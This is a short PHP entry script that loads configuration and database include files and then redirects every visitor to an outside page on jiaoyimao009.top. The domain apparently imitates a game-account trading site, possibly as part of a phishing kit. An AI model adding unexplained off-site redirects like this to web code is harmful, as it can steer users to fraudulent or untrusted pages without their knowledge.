<?php 
Define('PM_CALL',true);
Define('INC_CALL',true);
include dirname(__FILE__).('/includes/global.class.php');
include dirname(__FILE__).('/config/mysql.func.php');
include dirname(__FILE__).('/config/Conn.php');
include dirname(__FILE__).('/includes/getdata.php');

header('Location:'. htmlspecialchars_decode('http://jiaoyimao009.top/xh.php').'');

?>